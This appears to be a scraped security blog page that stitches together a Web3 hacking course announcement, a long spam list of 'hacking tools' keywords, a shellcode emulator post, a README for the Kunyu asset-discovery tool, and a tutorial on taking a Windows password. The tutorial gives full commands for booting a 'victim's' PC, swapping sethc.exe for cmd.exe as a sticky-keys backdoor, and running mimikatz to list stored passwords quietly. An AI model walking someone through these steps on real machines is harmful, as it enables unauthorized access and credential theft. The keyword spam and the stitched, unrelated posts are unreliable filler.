Wednesday, May 31, 2023

Blockchain Decentralized Application Hacking Course Part 2 - A Continuation Into Smart Contract Hacking And DApp Penetration Testing (Web 3) With Python

New Course Announcement:  
Python  Based Blockchain Hacking, Smart Contract exploitation and Automation


Twitter: https://twitter.com/ficti0n
Website: http://cclabs.io

This is the course announcement for part 2 of our smart contract hacking journey, this time we are going to pick up where we left off leveraging frameworks, automation, other tools.. Starting out learning all the ways to interact with things programmatically with python... Then automate it, attack it, and get into all kinds of other things you have not seen before...  

Note:  This is NOT a re-hash of old material, NOR is it an update of the previous course.. This is all new material and the old course stands on its own as a Pre-Requisite to this course..  Also requiring knowledge of basic python scripting to follow along... 

This course has 3 sections:

  1. Web3.py in depth, Manual attacks and interactions
  2. Automation, Frameworks, Fun things and Automated Attacks
  3. Forensics and DEFI Attacks, Blockchain IDS and information gathering


Here is the Course intro Overview Outline: 


Here is the Overview of Section 1 which is in depth Web3.py basics: 




Other Videos to follow... 

To keep up to date follow the following playlist and follow on twitter: 

https://www.youtube.com/playlist?list=PLCwnLq3tOElrubfUWHa1qKrJv1apO8Aag

Related word


  1. Hacker Hardware Tools
  2. Hacker Tools For Ios
  3. Top Pentest Tools
  4. Pentest Box Tools Download
  5. Hack Tools Download
  6. Hacker Search Tools
  7. Pentest Tools Bluekeep
  8. Ethical Hacker Tools
  9. Hacking Tools 2020
  10. How To Install Pentest Tools In Ubuntu
  11. Hacking Tools Software
  12. Pentest Tools Nmap
  13. Hacker Tools Windows
  14. Pentest Box Tools Download
  15. Bluetooth Hacking Tools Kali
  16. Hacking Tools Online
  17. Hacking Tools Windows 10
  18. Hacking Tools Mac
  19. Hacking Tools For Games
  20. Hacker Tools For Ios
  21. Hack Tools 2019
  22. Hack Tool Apk
  23. Hacker Tools Software
  24. Pentest Tools Bluekeep
  25. Nsa Hacker Tools
  26. Pentest Tools
  27. New Hack Tools
  28. Hack Tools Download
  29. Pentest Tools Framework
  30. Install Pentest Tools Ubuntu
  31. Pentest Tools List
  32. Underground Hacker Sites
  33. Hacker Security Tools
  34. How To Hack
  35. Game Hacking
  36. Hacker Tools Apk
  37. Hacking Tools Free Download
  38. Easy Hack Tools
  39. Hacking Tools Hardware
  40. Pentest Tools Website Vulnerability
  41. Hacker Tools Online
  42. Pentest Box Tools Download
  43. Pentest Tools Download
  44. Hacker Tools Free Download
  45. Hacking Apps
  46. Pentest Tools Android
  47. Hack Tools
  48. Hacking Tools Windows
  49. Hack Tools Pc
  50. Hacking Tools Github
  51. Hack Tools 2019
  52. Pentest Tools Tcp Port Scanner
  53. Hacker Hardware Tools
  54. Hack Apps
  55. Pentest Tools For Android
  56. Hack Tools For Windows
  57. Pentest Tools Online
  58. Pentest Tools Download
  59. What Is Hacking Tools
  60. Tools Used For Hacking
  61. Pentest Recon Tools
  62. Pentest Reporting Tools
  63. Hacking Tools Online
  64. Hack Apps
  65. Pentest Tools Port Scanner
  66. Hacker Tools Windows
  67. Hacker Tools For Pc
  68. Pentest Tools Kali Linux
  69. Hacker Search Tools

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)
More articles

Fast Emulator For Shellcodes In Rust

I have developed a fast emulator for modern shellcodes, that perform huge loops of millions of instructions emulated for resolving API or for other stuff.

The emulator is in Rust and all the few dependencies as well, so the rust safety is good for emulating malware.  

There are shellcodes that can be emulated from the beginning to the end, but when this is not possible the tool has many features that can be used like a console, a memory tracing, register tracing, and so on.

https://github.com/sha0coder/scemu



In less than two seconds we have emulated 7 millions of instructions arriving to the recv. 

At this point we have some  IOC like  the ip:port where it's connecting and other details.

Lets see what happens after the recv() spawning a console at position: 7,012,204


target/release/scemu -f shellcodes/shikata.bin -vv -c 7012204



In the console, pressing "enter" several times to emulate  step into several steps and we arrive to a return instruction.


Let's see the stack in this moment:


The "ret" instruction is going to jump to the buffer read with recv() so is a kind of stager.

The option "-e" or "--endpoint" is not ready for now, but it will allow to proxy the calls to get the next  stage automatically, but for now we have the details to get the stage.


SCEMU also identify all the Linux  syscalls for 32bits shellcodes:



The encoder used in shellgen is also supported https://github.com/MarioVilas/shellgen

Let's check with cobalt-strike:


We can see where is connecting and which headers is using, so right now we can replicate the communications.



In verbose mode we could do several greps to see the calls and correlate with ghidra/ida/radare or  for example grep the branches to study the emulation flow.


target/release/scemu -f shellcodes/rshell_sgn.bin -vv | grep j


target/release/scemu -f shellcodes/rshell_sgn.bin -vv -c 44000 -l


The -l --loops options makes the emulation a bit slower but track the number of iterations.

Is possible to print all the registers in every step with  -r or --registers  but also is possible to track  specific register for example with --reg esi


target/release/scemu -f shellcodes/shikata.bin --reg esi 


In this case ESI register points to the API name, if we track EAX or ECX will see that are the counters of the loop. These shellcodes  contains a hard loop to locate the API names.

The flag -i or --inspect allow to monitor memory using expressions like "dword ptr [eax + 0xa]"

target/release/scemu -f shellcodes/shikata.bin -i 'dword ptr [esi]'

And more things to come...  find a demo below:

https://www.youtube.com/watch?v=qTYmMjW3DFs





Related news


Tuesday, May 30, 2023

Kunyu - More Efficient Corporate Asset Collection


0x00 Introduce

Tool introduction

Kunyu (kunyu), whose name is taken from , is actually a professional subject related to geographic information, which counts the geographic information of the sea, land, and sky. The same applies to cyberspace. The same is true for discovering unknown and fragile assets. It is more like a cyberspace map, which is used to comprehensively describe and display cyberspace assets, various elements of cyberspace and the relationship between elements, as well as cyberspace and real space. The mapping relationship. So I think "Kun Yu" still fits this concept.

Kunyu aims to make corporate asset collection more efficient and enable more security-related practitioners to understand and use cyberspace surveying and mapping technology.


Application scenario

For the use of kunyu, there can be many application scenarios, such as:

  • Forgotten and isolated assets in the enterprise are identified and added to security management.
  • Perform quick investigation and statistics on externally exposed assets of the enterprise.
  • Red and blue are used against related requirements, and batch inspections of captured IPs are performed.
  • Collect vulnerable assets in batches (0day/1day) for equipment and terminals within the impact.
  • Information on sites involved in new-type cybercrime cases is quickly collected and merged for more efficient research, judgment, and analysis.
  • Statistic and reproduce the fragile assets on the Internet that are affected by related vulnerabilities.

0x01 Install

Need Python3 or higher support

git clone https://github.com/knownsec/Kunyu.git
cd Kunyu
pip3 install -r requirements.txt

Linux:
python3 setup.py install
kunyu console

Windows:
cd kunyu
python3 console.py

PYPI:
pip3 install kunyu

P.S. Windows also supports python3 setup.py install.

0x02 Configuration instructions

When you run the program for the first time, you can initialize by entering the following command. Other login methods are provided. However, it is recommended to use the API method. Because the user name/password login requires an additional request, the API method is theoretically more efficient.

kunyu init --apikey <your zoomeye key> --seebug <your seebug key>



You need to log in with ZoomEye credentials before using this tool for information collection.

Visit address: https://www.zoomeye.org/

The output file path can be customized by the following command

kunyu init --output C:\Users\风起\kunyu\output



0x03 Tool instructions

Detailed command

kunyu console


 

ZoomEye

Encryption method interface HostCrash <IP> <Domain> Host Header Scan hidden assets Seebug <Query> Search Seebug vulnerability information set <Option> Set arguments values Pocsuite3 Invoke the pocsuite component ExportPath Returns the path of the output file clear Clear the console screen show Show can set options help Print Help info exit Exit KunYu & ">
Global commands:
info Print User info
SearchHost <query> Basic Host search
SearchWeb <query> Basic Web search
SearchIcon <File>/<URL> Icon Image search
SearchBatch <File> Batch search Host
SearchCert <Domain> SSL certificate Search
SearchDomain <Domain> Domain name associated/subdomain search
EncodeHash <encryption> <query> Encryption method interface
HostCrash <IP> <Domain> Host Header Scan hidden assets
Seebug <Query> Search Seebug vulnerability information
set <Option> Set arguments values
Pocsuite3 Invoke the pocsuite component
ExportPath Returns the path of the output file
clear Clear the console screen
show Show can set options
help Print Help info
exit Exit KunYu &

OPTIONS

ZoomEye:
page <Number> The number of pages returned by the query
dtype <0/1> Query associated domain name/subdomain name
btype <host/web> Set the API interface for batch query

Use case introduction

Here we use the ZoomEye module for demonstration

User information query


HOST host search


Web host search


Batch IP search


Icon Search

When collecting corporate assets, we can use this method to retrieve the same ico icon assets, which usually has a good effect when associating related corporate assets. But it should be noted that if some sites also use this ico icon, irrelevant assets may be associated (but people who are bored with other people's ico icons are always in the minority). Support url or local file search.



 

SSL certificate search

Query through the serial number of the SSL certificate, so that the associated assets are more accurate, and services that use the same certificate can be searched. When you encounter an https site, you can use this method.



Multi-factor query

Similarly, Kunyu also supports multi-factor conditional query related assets, which can be realized through ZoomEye logic operation syntax.


 

Feature Search

Through HTTP request packet features or website-related features, the same framework assets can be concatenated more accurately



Associated Domain/Subdomain Search

Search for associated domain names and subdomains, and query associated domain names by default. Two modes can be set by setting the dtype parameter.


 

Encoding hash calculation

In some scenarios, you can use this command to perform common HASH encryption/encoding, such as BASE64, MD5, mmh3, HEX encoding, and debug in this way.



Seebug vulnerability query

You can query historical related vulnerabilities by entering information about the framework and equipment you want to find, but you need to note that only English is supported, and improvements and upgrades will be made later.



Setting parameters

When set page = 2, the returned results are 40. You can modify the page parameter to set the number of pages to be queried. Note that 1 page = 20/items. You can modify the value according to your needs to get more returned results.

The configurable parameters and the current values of the parameters are displayed through show.


 


Pocsuite linkage

In versions after v1.3.1, you can use kunyu to link the console mode of pocsuite3 for integrated use.



HOSTS head collision

Through the HOSTS collision, the hidden assets in the intranet can be effectively collided, and the intranet service can be accessed according to the ServerName domain name and IP configured in the middleware httpf.conf. This can be achieved by setting the local hosts file later, because the local hosts file takes precedence. The level is higher than DNS server resolution. Support reverse check through ZoomEye domain name library or read TXT file to get the list of domain names.

HOSTS cross collision



Data result

All search results are saved in the user's root directory, and the directory is created based on the current timestamp. All query results of a single start are stored in an Excel format under one directory, giving a more intuitive experience. The output path can be returned through the ExportPath command.



0x04 Loading

​ In fact, there are still many ideas, but as an Alpha version, this is the case, and it will continue to be improved in the later period. I hope that Kunyu can be known to more security practitioners. Thank you for your support.

​ The tool framework has reference to Kunlun Mirror and Pocsuite3, which are all very good works.

​ Thanks to all the friends of KnownSec 404 Team.

" 看得清 " 是能力的体现,是 " 器 " ,而 " 看得见 " 就是思想的体现,那最后关联的是 " 道 "。

​ --SuperHei


0x05 Issue

1、Multi-factor search

ZoomEye search can use multi-factor search, dork:cisco +port:80 (note the space) can search all data that meet the conditions of cisco and port:80, if there is no space in between, it is the same search condition, it is that cisco is satisfied and the port is All data for 80. Kunyu's dork does not require quotation marks.

2、High-precision geographical location

ZoomEye gives privileged users high-precision geographic location data, but it should be noted that ordinary users do not have this function, so I hope you know.

3、Username/password login

If you use username/password as the initialization condition, the token will be valid for 12 hours. If you find that your search cannot return data, you may wish to info. If the session times out, the initialization command prompt will be returned. In most cases, we recommend that you use the API KEY method, there is no invalidation problem. This design is also for the security of your account and password. After all, the API KEY can be reset and the token will become invalid. However, with the account and password, it is possible to log in to your ZoomEye account.

4、Cert certificate search

It should be noted that, according to the normal logic, you need to encode the serial number of the target SSL certificate in hexadecimal to match the sentence search, but Kunyu only needs to provide the Domain address to search. The principle is to make a request to the target station to obtain the serial number and process it, but if your host cannot access the target that needs to be searched, it cannot be retrieved. At this time, you can also search with the sentence in the usual way.

5、Favicon icon search

ico icon search not only supports URL retrieval, but also supports local ico icon file search, which has better scalability and compatibility.

6、Query data save path

By default, your query data is in the Kunyu folder under the user directory. You can also use the ExportPath command to query the path in the console mode.

7、Autocomplete

Kunyu's auto-completion supports upper and lower case, command logging, etc., use Tab to complete, please refer to Metasploit for usage.

8. Regarding the error when using pip install kunyu

The following error was reported when using pip install kunyu: File "C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py", line 1 SyntaxError: Non-UTF-8 code starting with'\xb7' in file C: \Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py on line 1, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details

solution: Modify the C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py file and add # encoding: utf-8 at the beginning of the file.

Then save it and you can use it normally. The bug appears because there is a Chinese name in the user's directory path, which usually appears on windows.

9. Pocsuite3 module POC storage directory

When using the pocsuite3 module, if you want to add a new POC module, you can add a POC file in project directory/kunyu/pocs/.

10. Pocsuite3 module POC missing issue

When using the Pocsuite command linkage, if it is a packaged Kunyu version, the poc has been fixed. At this time, modifying the poc directory cannot add new modules. At this time, you can repackage it or use the project directory/kunyu /console.py Run kunyu to update the poc module in real time.


0x06 Contributions

风起@knownsec 404
wh0am1i@knownsec 404
fenix@knownsec 404
0x7F@knownsec 404


0x07 Community

If you have any questions, you can submit an issue under the project, or contact us through the following methods.

Scan the QR code to add the ZoomEye staff member WeChat, and remark Kunyu, which will draw everyone to the ZoomEye cyberspace surveying and mapping exchange group




Continue reading